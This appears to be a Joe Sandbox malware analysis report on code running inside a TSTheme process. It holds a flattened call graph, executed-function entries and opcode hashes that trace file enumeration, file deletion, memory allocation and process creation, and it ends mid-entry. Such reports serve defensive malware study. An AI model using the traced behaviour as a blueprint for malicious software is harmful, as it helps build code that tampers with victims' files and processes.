2fdf180 89670->89669 89671 2fdf2b2 89670->89671 89703 2fded50 89670->89703 89672 2fe8020 NtClose 89671->89672 89674 2fdf2bc 89672->89674 89675 2fdf1b5 89675->89671 89676 2fdf1c0 89675->89676 89712 2fe9fd0 89676->89712 89678 2fdf1e9 89679 2fdf208 89678->89679 89680 2fdf1f2 89678->89680 89715 2fdec40 CoInitialize 89679->89715 89681 2fe8020 NtClose 89680->89681 89684 2fdf1fc 89681->89684 89683 2fdf216 89717 2fe7af0 89683->89717 89686 2fdf292 89687 2fe8020 NtClose 89686->89687 89688 2fdf29c 89687->89688 89721 2fe9ef0 89688->89721 89690 2fdf234 89690->89686 89691 2fe7af0 LdrInitializeThunk 89690->89691 89691->89690 89693 2fd5ff3 89692->89693 89694 2fd6014 89693->89694 89724 2fe7ba0 89693->89724 89694->89667 89696 2fd6037 89696->89694 89697 2fe8020 NtClose 89696->89697 89698 2fd60b7 89697->89698 89698->89667 89700 2fd60f5 89699->89700 89729 2fe7980 89700->89729 89704 2fded6c 89703->89704 89734 2fd44c0 89704->89734 89706 2fded93 89706->89675 89707 2fded8a 89707->89706 89708 2fd44c0 LdrLoadDll 89707->89708 89709 2fdee5e 89708->89709 89710 2fd44c0 LdrLoadDll 89709->89710 89711 2fdeeb8 89709->89711 89710->89711 89711->89675 89739 2fe8320 89712->89739 89714 2fe9feb 89714->89678 89716 2fdeca5 89715->89716 89716->89683 89718 2fe7b0d 89717->89718 89742 5142ba0 LdrInitializeThunk 89718->89742 89719 2fe7b3d 89719->89690 89743 2fe8370 89721->89743 89723 2fe9f09 89723->89669 89725 2fe7bba 89724->89725 89728 5142ca0 LdrInitializeThunk 89725->89728 89726 2fe7be6 89726->89696 89728->89726 89730 2fe799d 89729->89730 89733 5142c60 LdrInitializeThunk 89730->89733 89731 2fd6169 89731->89670 89733->89731 89736 2fd44e4 89734->89736 89735 2fd44eb 89735->89707 89736->89735 89737 2fd4537 89736->89737 89738 2fd4520 LdrLoadDll 89736->89738 89737->89707 89738->89737 89740 2fe833d 89739->89740 89741 2fe834e RtlAllocateHeap 89740->89741 89741->89714 89742->89719 89744 2fe838a 89743->89744 89745 2fe839b RtlFreeHeap 89744->89745 89745->89723 89746 2fe0f33 89747 2fe0f3d 89746->89747 89748 2fe0e9a 89746->89748 89749 2fe8020 NtClose 89748->89749 89752 2fe0eac 89748->89752 89750 2fe0ea1 89749->89750 89753 2fea010 RtlAllocateHeap 89750->89753 89753->89752 89754 2feb030 89755 2fe9ef0 RtlFreeHeap 89754->89755 89756 2feb045 89755->89756 89757 2fe4ff0 89758 2fe504a 89757->89758 89760 2fe5057 89758->89760 89761 2fe2bb0 89758->89761 89768 2fe9e70 89761->89768 89763 2fe2bee 89764 2fd44c0 LdrLoadDll 89763->89764 89766 2fe2ce6 89763->89766 89767 2fe2c2a 89764->89767 89765 2fe2c60 Sleep 89765->89767 89766->89760 89767->89765 89767->89766 89771 2fe8170 89768->89771 89770 2fe9e9e 89770->89763 89772 2fe81f7 89771->89772 89774 2fe8194 89771->89774 89773 2fe820d NtAllocateVirtualMemory 89772->89773 89773->89770 89774->89770 89775 2fd30ec 89780 2fd77e0 89775->89780 89778 2fe8020 NtClose 89779 2fd3111 89778->89779 89781 2fd77fa 89780->89781 89785 2fd30fc 89780->89785 89786 2fe7730 89781->89786 89784 2fe8020 NtClose 89784->89785 89785->89778 89785->89779 89787 2fe774a 89786->89787 89790 51435c0 LdrInitializeThunk 89787->89790 89788 2fd78ca 89788->89784 89790->89788 89791 2fcb4e4 89792 2fe9e70 NtAllocateVirtualMemory 89791->89792 89793 2fccb51 89792->89793 89794 2fd5760 89800 2fd7b60 89794->89800 89796 2fd5790 89798 2fd57da 89796->89798 89799 2fd57bc 89796->89799 89804 2fd7ae0 89796->89804 89801 2fd7b73 89800->89801 89811 2fe75a0 89801->89811 89803 2fd7b9e 89803->89796 89805 2fd7b24 89804->89805 89806 2fd7b45 89805->89806 89817 2fe73a0 89805->89817 89806->89796 89808 2fd7b35 89809 2fd7b51 89808->89809 89810 2fe8020 NtClose 89808->89810 89809->89796 89810->89806 89812 2fe75c4 89811->89812 89813 2fe7610 89811->89813 89812->89803 89816 5142dd0 LdrInitializeThunk 89813->89816 89814 2fe7635 89814->89803 89816->89814 89818 2fe740f 89817->89818 89819 2fe73c4 89817->89819 89822 5144650 LdrInitializeThunk 89818->89822 89819->89808 89820 2fe7434 89820->89808 89822->89820 89823 2fe74e0 89824 2fe7564 89823->89824 89826 2fe7507 89823->89826 89828 5142ee0 LdrInitializeThunk 89824->89828 89825 2fe7595 89828->89825 89830 2fd961b 89831 2fd962a 89830->89831 89832 2fe9ef0 RtlFreeHeap 89831->89832 89833 2fd9631 89831->89833 89832->89833 89834 2fd0b5b PostThreadMessageW 89835 2fd0b6d 89834->89835 89836 2fd275a 89837 2fd5fc0 2 API calls 89836->89837 89838 2fd2793 89837->89838 89839 2fc96d0 89840 2fc9aa4 89839->89840 89841 2fca052 89840->89841 89843 2fe9ba0 89840->89843 89844 2fe9bc3 89843->89844 89849 2fc3ff0 89844->89849 89846 2fe9bcf 89848 2fe9c00 89846->89848 89852 2fe4630 89846->89852 89848->89841 89856 2fd31f0 89849->89856 89851 2fc3ffd 89851->89846 89853 2fe468a 89852->89853 89855 2fe4697 89853->89855 89867 2fd16b0 89853->89867 89855->89848 89857 2fd3204 89856->89857 89859 2fd321d 89857->89859 89860 2fe8a70 89857->89860 89859->89851 89861 2fe8a88 89860->89861 89862 2fe8aac 89861->89862 89863 2fe7690 LdrInitializeThunk 89861->89863 89862->89859 89864 2fe8afe 89863->89864 89865 2fe9ef0 RtlFreeHeap 89864->89865 89866 2fe8b14 89865->89866 89866->89859 89868 2fd16eb 89867->89868 89883 2fd78f0 89868->89883 89870 2fd16f3 89871 2fe9fd0 RtlAllocateHeap 89870->89871 89881 2fd19bf 89870->89881 89872 2fd1709 89871->89872 89873 2fe9fd0 RtlAllocateHeap 89872->89873 89874 2fd171a 89873->89874 89875 2fe9fd0 RtlAllocateHeap 89874->89875 89876 2fd172b 89875->89876 89882 2fd17be 89876->89882 89898 2fd6720 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 89876->89898 89878 2fd44c0 LdrLoadDll 89879 2fd197f 89878->89879 89894 2fe6d50 89879->89894 89881->89855 89882->89878 89884 2fd791c 89883->89884 89885 2fd77e0 2 API calls 89884->89885 89886 2fd793f 89885->89886 89887 2fd7949 89886->89887 89888 2fd7961 89886->89888 89889 2fd7954 89887->89889 89891 2fe8020 NtClose 89887->89891 89890 2fd797d 89888->89890 89892 2fe8020 NtClose 89888->89892 89889->89870 89890->89870 89891->89889 89893 2fd7973 89892->89893 89893->89870 89895 2fe6daa 89894->89895 89897 2fe6db7 89895->89897 89899 2fd19d0 89895->89899 89897->89881 89898->89882 89915 2fd7bc0 89899->89915 89901 2fd1ec5 89901->89897 89902 2fd19f0 89902->89901 89919 2fe0810 89902->89919 89905 2fd1bee 89928 2feb100 89905->89928 89906 2fd1a4e 89906->89901 89923 2feafd0 89906->89923 89908 2fd7b60 LdrInitializeThunk 89911 2fd1c2e 89908->89911 89909 2fd1c03 89909->89911 89934 2fd0670 89909->89934 89911->89901 89911->89908 89913 2fd0670 LdrInitializeThunk 89911->89913 89912 2fd7b60 LdrInitializeThunk 89914 2fd1d5c 89912->89914 89913->89911 89914->89911 89914->89912 89916 2fd7bcd 89915->89916 89917 2fd7bee SetErrorMode 89916->89917 89918 2fd7bf5 89916->89918 89917->89918 89918->89902 89920 2fe0829 89919->89920 89921 2fe9e70 NtAllocateVirtualMemory 89920->89921 89922 2fe0831 89920->89922 89921->89922 89922->89906 89924 2feafe6 89923->89924 89925 2feafe0 89923->89925 89926 2fe9fd0 RtlAllocateHeap 89924->89926 89925->89905 89927 2feb00c 89926->89927 89927->89905 89929 2feb070 89928->89929 89930 2fe9fd0 RtlAllocateHeap 89929->89930 89931 2feb0cd 89929->89931 89932 2feb0aa 89930->89932 89931->89909 89933 2fe9ef0 RtlFreeHeap 89932->89933 89933->89931 89935 2fd0688 89934->89935 89938 2fe8290 89935->89938 89939 2fe82aa 89938->89939 89942 5142c70 LdrInitializeThunk 89939->89942 89940 2fd068f 89940->89914 89942->89940 89943 2fdbe90 89944 2fdbeb9 89943->89944 89945 2fdbfbd 89944->89945 89946 2fdbf63 FindFirstFileW 89944->89946 89946->89945 89949 2fdbf7e 89946->89949 89947 2fdbfa4 FindNextFileW 89948 2fdbfb6 FindClose 89947->89948 89947->89949 89948->89945 89949->89947 89950 2fdf850 89951 2fdf86d 89950->89951 89952 2fd44c0 LdrLoadDll 89951->89952 89953 2fdf88b 89952->89953 89954 2fe11d0 89958 2fe11df 89954->89958 89955 2fe1226 89956 2fe9ef0 RtlFreeHeap 89955->89956 89957 2fe1236 89956->89957 89958->89955 89959 2fe1267 89958->89959 89961 2fe126c 89958->89961 89960 2fe9ef0 RtlFreeHeap 89959->89960 89960->89961 89962 2fe09d1 89974 2fe7ea0 89962->89974 89964 2fe09f2 89965 2fe0a25 89964->89965 89966 2fe0a10 89964->89966 89968 2fe8020 NtClose 89965->89968 89967 2fe8020 NtClose 89966->89967 89969 2fe0a19 89967->89969 89971 2fe0a2e 89968->89971 89970 2fe0a5a 89971->89970 89972 2fe9ef0 RtlFreeHeap 89971->89972 89973 2fe0a4e 89972->89973 89975 2fe7f39 89974->89975 89977 2fe7ec4 89974->89977 89976 2fe7f4f NtReadFile 89975->89976 89976->89964 89977->89964 89981 2fd7000 89982 2fd706f 89981->89982 89983 2fd7015 89981->89983 89983->89982 89985 2fdac00 89983->89985 89986 2fdac26 89985->89986 89987 2fdae39 89986->89987 90012 2fe8400 89986->90012 89987->89982 89989 2fdac9c 89989->89987 89990 2feb100 2 API calls 89989->89990 89991 2fdacb5 89990->89991 89991->89987 89992 2fdad80 89991->89992 89993 2fe7690 LdrInitializeThunk 89991->89993 89994 2fd56e0 LdrInitializeThunk 89992->89994 89996 2fdad9c 89992->89996 89995 2fdad0e 89993->89995 89994->89996 89995->89992 90000 2fdad17 89995->90000 90001 2fdae21 89996->90001 90018 2fe7260 89996->90018 89997 2fdad68 89998 2fd7b60 LdrInitializeThunk 89997->89998 90002 2fdad76 89998->90002 89999 2fdad46 90033 2fe3840 LdrInitializeThunk 89999->90033 90000->89987 90000->89997 90000->89999 90015 2fd56e0 90000->90015 90003 2fd7b60 LdrInitializeThunk 90001->90003 90002->89982 90007 2fdae2f 90003->90007 90007->89982 90008 2fdadf8 90023 2fe7300 90008->90023 90010 2fdae12 90028 2fe7440 90010->90028 90013 2fe841d 90012->90013 90014 2fe842e CreateProcessInternalW 90013->90014 90014->89989 90016 2fe7850 LdrInitializeThunk 90015->90016 90017 2fd571e 90016->90017 90017->89999 90019 2fe72d2 90018->90019 90021 2fe7287 90018->90021 90034 51439b0 LdrInitializeThunk 90019->90034 90020 2fe72f7 90020->90008 90021->90008 90024 2fe7372 90023->90024 90025 2fe7327 90023->90025 90035 5144340 LdrInitializeThunk 90024->90035 90025->90010 90026 2fe7397 90026->90010 90029 2fe74b2 90028->90029 90031 2fe7467 90028->90031 90036 5142fb0 LdrInitializeThunk 90029->90036 90030 2fe74d7 90030->90001 90031->90001 90033->89997 90034->90020 90035->90026 90036->90030 90037 2fda700 90042 2fda430 90037->90042 90039 2fda70d 90056 2fda0d0 90039->90056 90041 2fda729 90043 2fda455 90042->90043 90067 2fd7db0 90043->90067 90046 2fda592 90046->90039 90048 2fda5a9 90048->90039 90049 2fda5a0 90049->90048 90051 2fda691 90049->90051 90082 2fd9b30 90049->90082 90053 2fda6e9 90051->90053 90091 2fd9e90 90051->90091 90054 2fe9ef0 RtlFreeHeap 90053->90054 90055 2fda6f0 90054->90055 90055->90039 90057 2fda0e6 90056->90057 90060 2fda0f1 90056->90060 90058 2fe9fd0 RtlAllocateHeap 90057->90058 90058->90060 90059 2fda107 90059->90041 90060->90059 90061 2fd7db0 GetFileAttributesW 90060->90061 90062 2fda3fe 90060->90062 90065 2fd9b30 RtlFreeHeap 90060->90065 90066 2fd9e90 RtlFreeHeap 90060->90066 90061->90060 90063 2fda417 90062->90063 90064 2fe9ef0 RtlFreeHeap 90062->90064 90063->90041 90064->90063 90065->90060 90066->90060 90068 2fd7dd1 90067->90068 90069 2fd7de3 90068->90069 90070 2fd7dd8 GetFileAttributesW 90068->90070 90069->90046 90071 2fe24a0 90069->90071 90070->90069 90072 2fe24ae 90071->90072 90073 2fe24b5 90071->90073 90072->90049 90074 2fd44c0 LdrLoadDll 90073->90074 90075 2fe24ea 90074->90075 90076 2fe24f9 90075->90076 90095 2fe1f70 LdrLoadDll 90075->90095 90078 2fe9fd0 RtlAllocateHeap 90076->90078 90081 2fe2691 90076->90081 90079 2fe2512 90078->90079 90080 2fe9ef0 RtlFreeHeap 90079->90080 90079->90081 90080->90081 90081->90049 90083 2fd9b56 90082->90083 90096 2fdd360 90083->90096 90085 2fd9bbd 90087 2fd9bdb 90085->90087 90088 2fd9d40 90085->90088 90086 2fd9d25 90086->90049 90087->90086 90101 2fd99f0 90087->90101 90088->90086 90089 2fd99f0 RtlFreeHeap 90088->90089 90089->90088 90092 2fd9eb6 90091->90092 90093 2fdd360 RtlFreeHeap 90092->90093 90094 2fd9f32 90093->90094 90094->90051 90095->90076 90098 2fdd376 90096->90098 90097 2fdd383 90097->90085 90098->90097 90099 2fe9ef0 RtlFreeHeap 90098->90099 90100 2fdd3bc 90099->90100 90100->90085 90102 2fd9a06 90101->90102 90105 2fdd3d0 90102->90105 90104 2fd9b0c 90104->90087 90106 2fdd3f4 90105->90106 90107 2fdd48c 90106->90107 90108 2fe9ef0 RtlFreeHeap 90106->90108 90107->90104 90108->90107 90109 2fe7640 90110 2fe765a 90109->90110 90113 5142df0 LdrInitializeThunk 90110->90113 90111 2fe7682 90113->90111 90119 2fe7000 90120 2fe701a 90119->90120 90121 2fe702b RtlDosPathNameToNtPathName_U 90120->90121 90122 2fe7f80 90123 2fe7fec 90122->90123 90125 2fe7fa7 90122->90125 90124 2fe8002 NtDeleteFile 90123->90124 90126 2fe7d40 90127 2fe7de9 90126->90127 90129 2fe7d68 90126->90129 90128 2fe7dff NtCreateFile 90127->90128

                                    Executed Functions

                                    Function 02FDBE90 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02FDBF74
                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02FDBFAF
                                    • FindClose.KERNELBASE(?), ref: 02FDBFBA
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 42131818c073d7acbafc637ce1124cfd21395ed37e2af7b24c117cb915c70900
                                    • Instruction ID: 5f7c296261d9b3437dd3877972fe364598c211ec2d4d07c7968155c563e84e0f
                                    • Opcode Fuzzy Hash: 42131818c073d7acbafc637ce1124cfd21395ed37e2af7b24c117cb915c70900
                                    • Instruction Fuzzy Hash: C8315EB59003087BDB21DFA1CC85FEF777DAB84789F18455CFA09A6180D770AA848FA5
                                    Function 02FE7D40 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02FE7E30
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction ID: 7eb547db91a36e330c08c7ff2d288f81080ac7258bad907188c9cffb533eadff
                                    • Opcode Fuzzy Hash: 6f2ba7e18a4266f001064aef61e5deb6503efa637d4ae4d4b28708f0aa72d344
                                    • Instruction Fuzzy Hash: 6231C5B5A01209AFCB14DF99DC81EEFB7B9AF8C714F108609F919A3240D774A911CFA5
                                    Function 02FE7EA0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02FE7F78
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction ID: 39280da2a561e232d730d4b74b7bcaa78641fa05f7371ff2d1439cceaeebd5d0
                                    • Opcode Fuzzy Hash: b1cd31cec012f2a3f82fb82dc9ec57123c7f30fd2f4f7fc8eb654dd285773076
                                    • Instruction Fuzzy Hash: 753119B1A00209ABDB14DF98DC40EEFB7B9EF8C314F108609F918A3240D370A9118FA5
                                    Function 02FE8170 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(02FD1A4E,?,02FE6DB7,00000000,00000004,00003000,?,?,?,?,?,02FE6DB7,02FD1A4E,02FE0831,02FE6DB7,00000000), ref: 02FE822A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    • Opcode ID: c0c488b485559df72990ccfb6aafe851872c6a3687bd3510d1ffb4048d5f7557
                                    • Instruction ID: 53b239c3404f86d759f500fb99e85986545b4a5e3f1c717a290835f5240338ba
                                    • Opcode Fuzzy Hash: c0c488b485559df72990ccfb6aafe851872c6a3687bd3510d1ffb4048d5f7557
                                    • Instruction Fuzzy Hash: C4212CB5A00209ABDB10DF68DC41FEFB7B9EF88710F108509FE09A7240D774A810CBA5
                                    Function 02FE7F80 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: 74d524388c9cbe3065b92d4363313ecc9752fb2f60f185aa08dc3c7570f744b6
                                    • Instruction ID: e33b7ab78e160cea6ea3ed4f64f2520abe28dc4da436a392f62614dc04fae1b5
                                    • Opcode Fuzzy Hash: 74d524388c9cbe3065b92d4363313ecc9752fb2f60f185aa08dc3c7570f744b6
                                    • Instruction Fuzzy Hash: 3901A171A002047BE620EA64DC45FABB3ADDF89754F00450DFB1997180D7B1B910CBF6
                                    Function 02FE8020 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02FE8054
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction ID: 0a310e918947cbb63b72c92bbb06ae28eb7156955f9664b28b5e83f24c66e4ea
                                    • Opcode Fuzzy Hash: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction Fuzzy Hash: 9FE08C362002087BD620FA69DC01F9BB76DDFC5764F518419FB0CA7242C6B1BA118BF4
                                    Function 05144650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 74b2d5888df4d730f904d3a1e5bd46d4cd0c6ab1b2ced7555da500026217a203
                                    • Instruction ID: daf5ac90a6be8df35151d42c4da77f8de2522cb20521baa5b0001cb0cea7fc18
                                    • Opcode Fuzzy Hash: 74b2d5888df4d730f904d3a1e5bd46d4cd0c6ab1b2ced7555da500026217a203
                                    • Instruction Fuzzy Hash: 5F90026260150092414071588944406601597E13113E5C115B4655560C872C89559669
                                    Function 05144340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f444e8f4d6ce0bb9e061cdce67d179c8cdcb3507060ad8daab8a415b8fdce065
                                    • Instruction ID: f9b30bd9e4d37f77a5ace3edeffc3500937a6eb41ddd6b979a399744181fea35
                                    • Opcode Fuzzy Hash: f444e8f4d6ce0bb9e061cdce67d179c8cdcb3507060ad8daab8a415b8fdce065
                                    • Instruction Fuzzy Hash: B6900232605800629140715889C4546401597E0311BA5C011F4525554C8B288A565761
                                    Function 05142D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 4ba9f03c1c54467a6151b26aede9e536937e50606a422d9021d9fad221539f76
                                    • Instruction ID: c064eaaccf6c7d5fc0f6b70ec7a799c97862fa044b4d9e80bf41efae9fde9533
                                    • Opcode Fuzzy Hash: 4ba9f03c1c54467a6151b26aede9e536937e50606a422d9021d9fad221539f76
                                    • Instruction Fuzzy Hash: EF90022A21340052D1807158954860A001587D1212FE5D415B4116558CCA2989695721
                                    Function 05142D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: f5f5be2a0dee0fd9e9c69f95ec2736f1c5531d324fba5565c840e21b3a636a05
                                    • Instruction ID: d0a7374e7b3efec9834b8d402d1a4f4c6b8f1b29f997df0bc1a5349f5b285fe9
                                    • Opcode Fuzzy Hash: f5f5be2a0dee0fd9e9c69f95ec2736f1c5531d324fba5565c840e21b3a636a05
                                    • Instruction Fuzzy Hash: CE90022230140053D140715895586064015D7E1311FA5D011F4515554CDA2989565622
                                    Function 05142DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 30a597221717d58ce28465cdf1be8464af732f9e774226c443b09bcb3e82331a
                                    • Instruction ID: c87593201271aa94ad8e78d558b4de90828e1f51f2ba4700544b33231c350f06
                                    • Opcode Fuzzy Hash: 30a597221717d58ce28465cdf1be8464af732f9e774226c443b09bcb3e82331a
                                    • Instruction Fuzzy Hash: DA900222242441A25545B1588544507401697E02517E5C012B5515950C863A9956DA21
                                    Function 05142DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 11183ecd88394e48692e690503ed229979eeeb47354d78c1a387dbf15c063bd2
                                    • Instruction ID: 19a13ea026c7d1346755fb83bfba3d97bbdf96cbd86a7b71ad4f96bcc9e8d546
                                    • Opcode Fuzzy Hash: 11183ecd88394e48692e690503ed229979eeeb47354d78c1a387dbf15c063bd2
                                    • Instruction Fuzzy Hash: 0A90023220140463D11171588644707001987D0251FE5C412B4525558D976A8A52A521
                                    Function 05142C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: ac4ab698de29261bde8cb8cf32ce416f5175e04554af1ccdb761101e6eb7bc5a
                                    • Instruction ID: 048232707d9b73bd377dd3009d6f738c0658ed5c96a32a80cc6deb83549c9389
